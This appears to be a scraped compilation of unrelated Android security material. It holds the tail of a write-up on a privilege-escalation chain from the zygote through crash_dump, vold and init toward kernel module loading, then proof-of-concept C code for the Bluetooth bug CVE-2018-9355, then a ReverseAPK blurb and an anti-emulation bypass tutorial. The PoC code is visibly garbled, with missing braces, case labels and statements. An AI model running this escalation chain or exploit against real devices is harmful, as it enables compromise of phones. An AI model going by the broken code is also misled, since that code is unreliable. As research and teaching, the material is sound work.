Note that the ability to actually ptrace() a process is still gated by the normal Linux DAC checks, andcrash_dump can’t use CAP_SYS_PTRACE or CAP_SETUID. If a normal app managed to inject code intocrash_dump64, it still wouldn’t be able to leverage that to attack system components because of the UID mismatch.


If you’ve been reading carefully, you might now wonder whether we could just place our own binary with context u:object_r:crash_dump_exec:s0 on our fake /data filesystem, and then execute that to gain code execution in the crash_dump domain. This doesn’t work because vold — very sensibly — hardcodes theMS_NOSUID flag when mounting USB storage devices, which not only degrades the execution of classic setuid/setgid binaries, but also degrades the execution of files with file capabilities and executions that would normally involve automatic SELinux domain transitions (unless the SELinux policy explicitly opts out of this behavior by granting PROCESS2__NOSUID_TRANSITION).


To inject code into crash_dump64, we can create a new mount namespace with unshare() (using ourCAP_SYS_ADMIN capability), then call pivot_root() to point the root directory of our process into a directory we fully control, and then execute crash_dump64. Then the kernel parses the ELF headers ofcrash_dump64, reads the path to the linker (/system/bin/linker64), loads the linker into memory from that path (relative to the process root, so we can supply our own linker here), and executes it.


At this point, we can execute arbitrary code in crash_dump context and escalate into vold from there, compromising the TCB. At this point, Android’s security policy considers us to have kernel-equivalent privileges; however, to see what you’d have to do from here to gain code execution in the kernel, this blogpost goes a bit further.

From vold to init context

It doesn’t look like there is an easy way to get from vold into the real init process; however, there is a way into the init SELinux context. Looking through the SELinux policy for allowed transitions into init context, we find the following policy:


domain_auto_trans(kernel, init_exec, init)


This means that if we can get code running in kernel context to execute a file we control labeled init_exec, on a filesystem that wasn’t mounted with MS_NOSUID, then our file will be executed in init context.


The only code that is running in kernel context is the kernel, so we have to get the kernel to execute the file for us. Linux has a mechanism called «usermode helpers» that can do this: Under some circumstances, the kernel will delegate actions (such as creating coredumps, loading key material into the kernel, performing DNS lookups, …) to userspace code. In particular, when a nonexistent key is looked up (e.g. viarequest_key()), /sbin/request-key (hardcoded, can only be changed to a different static path at kernel build time with CONFIG_STATIC_USERMODEHELPER_PATH) will be invoked.


Being in vold, we can simply mount our own ext4 filesystem over /sbin without MS_NOSUID, then callrequest_key(), and the kernel invokes our request-key in init context.


The exploit stops at this point; however, the following section describes how you could build on it to gain code execution in the kernel.

From init context to the kernel

From init context, it is possible to transition into modprobe or vendor_modprobe context by executing an appropriately labeled file after explicitly requesting a domain transition (note that this is domain_trans(), which permits a transition on exec, not domain_auto_trans(), which automatically performs a transition on exec):


domain_trans(init, { rootfs toolbox_exec }, modprobe)
domain_trans(init, vendor_toolbox_exec, vendor_modprobe)


modprobe and vendor_modprobe have the ability to load kernel modules from appropriately labeled files:


allow modprobe self:capability sys_module;
allow modprobe { system_file }:system module_load;
allow vendor_modprobe self:capability sys_module;
allow vendor_modprobe { vendor_file }:system module_load;


Android nowadays doesn’t require signatures for kernel modules:


walleye:/ # zcat /proc/config.gz | grep MODULE
# CONFIG_MODULE_SIG is not set


Therefore, you could execute an appropriately labeled file to execute code in modprobe context, then load an appropriately labeled malicious kernel module from there.

Lessons learned

Notably, this attack crosses two weakly-enforced security boundaries: The boundary from blkid_untrusted tovold (when vold uses the UUID provided by blkid_untrusted in a pathname without checking that it resembles a valid UUID) and the boundary from the zygote to the TCB (by abusing the zygote’s CAP_SYS_ADMINcapability). Software vendors have, very rightly, been stressing for quite some time that it is important for security researchers to be aware of what is, and what isn’t, a security boundary — but it is also important for vendors to decide where they want to have security boundaries and then rigorously enforce those boundaries. Unenforced security boundaries can be of limited use — for example, as a development aid while stronger isolation is in development -, but they can also have negative effects by obfuscating how important a component is for the security of the overall system.

In this case, the weakly-enforced security boundary between vold and blkid_untrusted actually contributed to the vulnerability, rather than mitigating it. If the blkid code had run in the vold process, it would not have been necessary to serialize its output, and the injection of a fake UUID would not have worked.

PoC for Android Bluetooth bug CVE-2018-9355

CVE-2018-9355 A-74016921 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1
Картинки по запросу Android Kernel CVE POC
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  GNU General Public License for more details.
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

/** CVE-2018-9355

#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <pthread.h>

#include <bluetooth/bluetooth.h>
#include <bluetooth/sdp.h>
#include <bluetooth/l2cap.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>

#define EIR_FLAGS                   0x01  /* flags */
#define EIR_NAME_COMPLETE           0x09  /* complete local name */
#define EIR_LIM_DISC                0x01 /* LE Limited Discoverable Mode */
#define EIR_GEN_DISC                0x02 /* LE General Discoverable Mode */

#define UINT_DESC_TYPE 1

#define SIZE_TWO_BYTES 1
#define SIZE_ONE_BYTE 0
#define UUID_DESC_TYPE 3
#define ATTR_ID_SERVICE_ID 0x0003

static int count = 0;
static int do_continuation;

static int init_server(uint16_t mtu)
	struct l2cap_options opts;
	struct sockaddr_l2 l2addr;
	socklen_t optlen;
	int l2cap_sock;

	/* Create L2CAP socket */
	if (l2cap_sock < 0) {
		printf("opening L2CAP socket: %s", strerror(errno));
		return -1;

	memset(&l2addr, 0, sizeof(l2addr));
	l2addr.l2_family = AF_BLUETOOTH;
	bacpy(&l2addr.l2_bdaddr, BDADDR_ANY);
	l2addr.l2_psm = htobs(SDP_PSM);

	if (bind(l2cap_sock, (struct sockaddr *) &l2addr, sizeof(l2addr)) < 0) {
		printf("binding L2CAP socket: %s", strerror(errno));
		return -1;

	int opt = L2CAP_LM_MASTER;
	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_LM, &opt, sizeof(opt)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;

	memset(&opts, 0, sizeof(opts));
	optlen = sizeof(opts);

	if (getsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, &optlen) < 0) {
		printf("getsockopt: %s", strerror(errno));
		return -1;
	opts.omtu = mtu;
	opts.imtu = mtu;

	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, sizeof(opts)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;

	if (listen(l2cap_sock, 5) < 0) {
	  printf("listen: %s", strerror(errno));
	  return -1;

	return l2cap_sock;

static int process_service_search_req(uint8_t *pkt)
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;

	/* Total Handles */
	bt_put_be16(400, pkt); pkt += 2;
	bt_put_be16(400, pkt); pkt += 2;

	/* and that's it! */
	/* TODO: Can we do some heap grooming to make sure we don't get a continuation? */

	//bt_put_be16((pkt - start) - 2, lenloc);
	return pkt - start;

static uint8_t *place_uid(uint8_t *pkt, int o)
	int i;
	for (i = 0; i < 16; i++)
		*pkt++ = 0x16 + (i + o);
	return pkt;


static size_t flood_u128s(uint8_t *pkt)
	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	size_t retsize = 0;

	bt_put_be16(9, pkt);pkt += 2;

	if (do_continuation == 1) {
		*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
		*pkt |= SIZE_IN_NEXT_WORD;
		start = pkt;
		pkt += 2;


	for (i = 0; i < 31; i++) {

		*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;;
		/* Attr ID */
		bt_put_be16(ATTR_ID_SERVICE_ID, pkt); pkt += 2;

		pkt = place_uid(pkt, i);
	/* Set the continuation */
	if (do_continuation) {
		bt_put_be16(654, lenloc);
		bt_put_be16(651 * 2, start);
		*pkt = 1;
		retsize = 658;
	else {
		bt_put_be16(651, lenloc);
		//bt_put_be16(648, start);
		*pkt = 0;
		retsize = 654;
	//	bt_put_be16((pkt - lenloc) + 10, lenloc);
	//	bt_put_be16((pkt - start) + 10, start);
	printf("%s: size is pkt - lenloc %zu and pkt is 0x%02x\n", __func__, pkt - lenloc, *pkt);

	return retsize;


static size_t do_fake_svcsar(uint8_t *pkt)

	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	/* Id and length -- ignored in the code */
	//bt_put_be16(0, pkt);pkt += 2;
	//bt_put_be16(0xABCD, pkt);pkt += 2;
	/* list byte count */
	bt_put_be16(9, pkt);pkt += 2;

	*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;


	*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;;
	/* Attr ID */
	bt_put_be16(0x0100, pkt); pkt += 2;



	/* Set the continuation */
	if (do_continuation)
		*pkt = 1;
		*pkt = 1;

	/* Place the size... */
	//bt_put_be16((pkt - start) - 2, lenloc);

	printf("%zu\n", pkt-start);
	return (size_t) (pkt - start);

static void process_request(uint8_t *buf, int fd)
	sdp_pdu_hdr_t *reqhdr = (sdp_pdu_hdr_t *) buf;
	sdp_pdu_hdr_t *rsphdr;
	uint8_t *rsp = malloc(65535);
	int status = SDP_INVALID_SYNTAX;
	int send_size = 0;

	memset(rsp, 0, 65535);
	rsphdr = (sdp_pdu_hdr_t *)rsp;
	rsphdr->tid = reqhdr->tid;

	switch (reqhdr->pdu_id) {
		printf("Got a svc srch req\n");
		send_size = process_service_search_req(rsp + sizeof(sdp_pdu_hdr_t));
		rsphdr->pdu_id = SDP_SVC_SEARCH_RSP;
		rsphdr->plen = htons(send_size);
		printf("Got a svc attr req\n");
		//status = service_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_ATTR_RSP;
		printf("Got a svc srch attr req\n");
		//status = service_search_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_SEARCH_ATTR_RSP;
		send_size = flood_u128s(rsp + sizeof(sdp_pdu_hdr_t));
		//do_fake_svcsar(rsp + sizeof(sdp_pdu_hdr_t)) + 3;
		rsphdr->plen = htons(send_size);
		printf("Unknown PDU ID : 0x%x received", reqhdr->pdu_id);
	printf("%s: sending %zu\n", __func__, send_size + sizeof(sdp_pdu_hdr_t));
	send(fd, rsp, send_size + sizeof(sdp_pdu_hdr_t), 0);

static void *l2cap_data_thread(void *input)
	int fd = *(int *)input;
	sdp_pdu_hdr_t hdr;
	uint8_t *buf;
	int len, size;

	while (true) {
		len = recv(fd, &hdr, sizeof(sdp_pdu_hdr_t), MSG_PEEK);
		if (len < 0 || (unsigned int) len < sizeof(sdp_pdu_hdr_t)) {

		size = sizeof(sdp_pdu_hdr_t) + ntohs(hdr.plen);
		buf = malloc(size);
		if (!buf)

		printf("%s: trying to recv %d\n", __func__, size);
		len = recv(fd, buf, size, 0);
		if (len <= 0) {

		if (!count) {
			process_request(buf, fd);
			count ++;
		if (count >= 1) {
			do_continuation = 0;
			process_request(buf, fd);


/* derived from hciconfig.c */
static void *advertiser(void *unused)
	uint8_t status;
	int device_id, handle;
	struct hci_request req = { 0 };
	le_set_advertise_enable_cp acp = { 0 };
	le_set_advertising_parameters_cp avc = { 0 };
	le_set_advertising_data_cp data = { 0 };

	device_id = hci_get_route(NULL);

	if (device_id < 0) {
		printf("%s: Failed to get route: %s\n", __func__, strerror(errno));
		return NULL;
	handle = hci_open_dev(hci_get_route(NULL));
	if (handle < 0) {
		printf("%s: Failed to open and aquire handle: %s\n", __func__, strerror(errno));
		return NULL;

	avc.min_interval = avc.max_interval = htobs(150);
	avc.chan_map = 7;
	req.ogf = OGF_LE_CTL;
	req.cparam = &avc;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.cparam = &acp;
	req.rparam = &status;
	req.rlen = 1;[0] = htobs(2);[1] = htobs(EIR_FLAGS);[2] = htobs(EIR_GEN_DISC | EIR_LIM_DISC);[3] = htobs(6);[4] = htobs(EIR_NAME_COMPLETE);[5] = 'D';[6] = 'L';[7] = 'E';[8] = 'A';[9] = 'K';

	data.length = 10;

	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.cparam = &data;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	printf("Device should be advertising under DLEAK\n");

int main(int argc, char **argv)
	pthread_t *io_channel;
	pthread_t adv;
	int       fds[16];
	const int io_chans = 16;
	struct sockaddr_l2 addr;
	socklen_t qlen = sizeof(addr);
	socklen_t len = sizeof(addr);
	int l2cap_sock;
	int i;

	pthread_create(&adv, NULL, advertiser, NULL);
	l2cap_sock = init_server(652);
	if (l2cap_sock < 0)
		return EXIT_FAILURE;

	io_channel = malloc(io_chans * sizeof(*io_channel));
	if (!io_channel)
		return EXIT_FAILURE;

	do_continuation = 1;
	for (i = 0; i < io_chans; i++) {
		printf("%s: Going to accept on io chan %d\n", __func__, i);
		fds[i] = accept(l2cap_sock, (struct sockaddr *) &addr, &len);
		if (fds[i] < 0) {
			printf("%s: Accept failed with %s\n", __func__, strerror(errno));
		printf("%s: accepted\n", __func__);
		pthread_create(&io_channel[i], NULL, l2cap_data_thread, &fds[i]);

ReverseAPK — Quickly Analyze And Reverse Engineer Android Packages

Quickly analyze and reverse engineer Android applications.


  • Displays all extracted files for easy reference
  • Automatically decompile APK files to Java and Smali format
  • Analyze AndroidManifest.xml for common vulnerabilities and behavior
  • Static source code analysis for common vulnerabilities and behavior
    • Device info
    • Intents
    • Command execution
    • SQLite references
    • Logging references
    • Content providers
    • Broadcast recievers
    • Service references
    • File references
    • Crypto references
    • Hardcoded secrets
    • URL’s
    • Network connections
    • SSL references
    • WebView references




reverse-apk <apk_name>


Bypassing Android Anti-Emulation


This is the first of a series of posts where we will focus in solving Android Reversing challenges. The challenge is focused on a binary protection called «anti-emulation», (you can find more info in the OWASP Top Ten 2014/2016 article:). In the upcoming entries we will talk about other protections like root checker, certificate pinning, anti-tampering, obfuscation techniques, along with ways to protect our app from differents tools (Xposed tool, Frida, etc).

The download link for the apk is and the sha1 signature is:
a2d88143cc3de73387931f84439a4c5e4fdfe123 ReverzeMe1.apk

Before the analysis of the challenge itself I will introduce the concept of «Anti-Emulation» on Android. A good reference for this topic is the Mobile Security Testing Guide by OWASP. They show some examples about these techniques, and different ways to analyze them. There is also an API called SafetyNet, which is an Android API that creates a profile of the device using software and hardware information which is useful for checking different Android protections.

If we see inside the Emulator Detection Examples section, an application has several ways to detect the emulation process.

For example, by checking differents methods like «Build»«TelephonyManager»,«android.os.SystemProperties»«ro.product.device»«ro.kernel.qemu», etc. Depending on the response it can infer if it is running on a physical device in an Android Emulator. To check if the app has this implementation in place, we can try to obtain its code. This can be done through differents techniques and we can use some tools such as apktooljadx or cfr, etc.

We will see how we can make use of some of those tools to obtain a really good approximation of the application code. For example, using apktool we can decode resources to nearly original form. We can even rebuild them after making some modifications. With “jadx» or «cfr» (boths java decompilers) we can analyze the «java code» obtained after the decompilation process. This practice, allows us to look at the code in more natural way, since the output from the java decompilers are «.java» files whereas the output from apktool are «.smali» code files.

I will not get into Java decompilers in this post, because it is a out of the scope. will simply use them to analyze the code for the application in the challenge. Then, we will modify the application from the .smali code. We will show how to use apktool to obtain a good an approximation of the code, to be able to modify it as we need to and then re-build it.
With this in mind, we will take a look at which is the process to create an APK file, since it will be useful to start trying to solve the challenge.

The process of creating an APK file:

  1. First, the developer creates its application in .java to then be compiled into into .class files.
  2. Once these .class files are created, they are converted into .dex (Dalvik EXecutables) files. These files contain byte code for the Dalvik Virtual Machine (DVM) which is a non-standar JVM that runs on Android devices.
  3. The DVM runs the DEX files while ART runs OAT (ELF) files.
  4. Some other XML files are converted to a binary format optimized for space.
  5. The last step is the APK creation from the .dex files, binary XML files and other resources needed to run the application and are packaged into an Android Package file (.apk).
  6. After the APK file is signed by the developer (we’ll come back to this in the «Manual patching with apktool» section), the APK is ready to be installed.
  7. If we want to look at the APK file, we can check its content by unpacking it, for example: $unzip -e example.apk -d example_folder

In short, the APK file is just a signed zip file that we can unzip them using the unzip command:

$unzip ReverseMe1.apk -d reverseme_unzipped

If we take a look at the manifest, we notice that the resources are encoded, we can use apktool to decode them later.$more AndroidManifest.xml

Anti-Emulation Checks:

As we mentioned earlier, there are several checks that an application can perform in order to detect whether we are running it on an emulated environment or an actual device. Usually malware APKs have these kind of protections to avoid any analisis. Some common validations are listed here (anti-emulation process), along with some examples.

Below are some code examples of different validations that I have encountered on applications while writing this post:

Some validation methods are even called “isEmulator()”“carrierNameFromTelephonyManager()”, or my personal favorite so far, “smellsLikeAnEmulator()”. All of them look for the same, or similar validations. They test with “equals”, “contains”, “startsWith” or “endsWith” against some hardcoded strings that can be interpreted as being set by an emulator. But they all look pretty much the same.

I asked myself why this happened? I google it and I had the answer, of course, the first result was a stackoverflow response.

I started looking into some others apps, and I found some many more quite similar implementations:

The difference with the previous set of validation methods is that, while the first set validates through “string comparisons”, the second one does by looking at the “Android system properties” to try to detect emulated environments.

Then, by simply analyzing the implementation methods, we can identify two main approaches to implement an anti-emulation protection. We can use this link.

Strings comparisons:

Let’s take look at the “isEmulator()” example and their validations:

I wrote this reference table:

We can check them in a easy way using the following command in our computers with adb:

╰─$ adb shell getprop generic/vbox86p/vbox86p:5.1/LMY47D/genymotion08250738:userdebug/test-keys

Basically we can use $adb shell getprop < key > to check the differents values.

Android System Properties validations:

Now that we know how to check for validation through strings, we can do the same with the Android System Properties validations.

Android has a set of properties about the device that can be read using the getprop command line utility, like we saw recently. Those System Properties are stored in a key value pair format in the property files (default.prop, local.prop, etc). And we’ll read those to check the Anti-Emulation process.

If we want to understand more about the property files, using “adb shell cat default.prop” we can check the property output:

$adb shell cat default.prop


But if we returned to the previous image:

They are checking ro.hardwarero.kernel.qemuro.serialnoro.product.namero.product.modelro.hardware, etc. We can check this output too using:

╰─$ adb shell getprop
╰─$ adb shell getprop ro.product.device
╰─$ adb shell getprop ro.product.model
Custom Phone - 5.1.0 - API 22 - 768x1280
╰─$ adb shell getprop ro.kernel.qemu
╰─$ adb shell getprop ro.hardware
╰─$ adb shell getprop qemu.hw.mainkeys
╰─$ adb shell getprop ro.bootloader
╰─$ adb shell getprop ro.bootmode
╰─$ adb shell getprop
╰─$ adb shell getprop
╰─$ adb shell getprop

And again if the value of is 1, the app is running on a emulator. The same with ro.kernel.qemu and the others.

Now is easy to understand which part of the code we need to modify to bypass the emulation process. We need to check all the implementations inside the code to bypass the application.

Challenge resolution:

Jadx challenge interpretation:

If we install the application inside the emulator and run it, we will see something similar to the screenshot below.. If we write some alphanumeric input a warning stating «This Devices is not supported» will appear. Since we don’t know why this happened, we can use jadx to obtain the .java code and use it as a starting point to determine the reason.

Of course, we can also use apktool or unzip the APK file to know more about the application, and maybe obtain some other kind of information. In this approach, we will focus on the .java code and try to understand the application workflow.

To decompile the APK, using jadx is enough for this challenge, although there are lots of Java decompilers out there that we could also use.

$jadx ReverzeMe1.apk

We can see some errors and warnings in the images above, but for the purpose of this post they’re not important. Once the decompilation process has finished, the tool should have created a folder with all the decompiled files, which look like this:

If we look for the text with the warning we saw earlier, we’ll find a «toast», which is a view containing a quick little message for the user. The toast class helps you create and manage them. We can also note that the message is shown depending on the value returned by «ChallengeJNI.this.checkIfDeviceIsEmulator().booleanValue()».

What do you think about this line?? :).

Let’s take a look at the implementation of the «checkIfDeviceIsEmulator()» function:

Basically what it is doing is checking some strings against a set of predefined strings, like we saw in the “Anti-Emulation Checks” before. Now we will try to bypass them.


Apktool challenge interpretation:

Like we already saw, we need to modify the checkIfDeviceIsEmulator() function in order to bypass the application’s validation, so now we are going to use apktool to do that.

Apktool patching and reversing engineering:

After we have installed apktool, we can check the options tool. For now we will focus on the decode (‘d’) and build (‘b’) options. Apktool needs an input .apk, which in this case is the one from the challenge we are trying to solve.


To decode the application execute the following command:

$apktool d ReverseMe1.apk -output reverseme_apktool
$ls -la
$cd reverseme_apktool
$ls -la 

We can see the internal structure of the decoded APK, the AndroidManifest.xml file and the differents folders like the smali code. Is important to remember the normal APK structure.

  • smali — disassembled java code
  • res — resources, strings
  • assets — files bundled inside the APK
  • lib — native libraries (*.so files)
  • AndroidManifest.xml — decoded version
  • original and apktool.yml — used by apktool

After decoding the app, we can see the AndroidManifest.xml.

If we look inside the Smali folder we can see all the smali files

$more ChallengeJNI\$1.smali$more ChallengeJNI.smali

As we can see, working with smali code is harder than with java, so we will move to java decompilers to analyze and interpreter the application code. And after that, we will modify the application to obtain the bypass’ smali code and re build the application. To do that we will make use of some dalvik opcodes.

Understanding dalvik opcodes:

This link is really useful, I used it to create a table showing some of the most interesting examples from the “dalvik opcodes” used by the application.

Something that we will see very often in the code is a line like this:

“.method private checkIfDeviceIsEmulator ()Ljava/lang/Boolean;”

It’s important to understand the meaning of this, so let’s break it down:

  1. “.method private” -> is the type of method.
  2. checkIfDeviceIsEmulator -> the method name.
  3. ()Ljava/lang/Boolean; -> the type of the return value, prefixed with L, dots “.” replaced with slashes “/” and suffixed with semicolon ;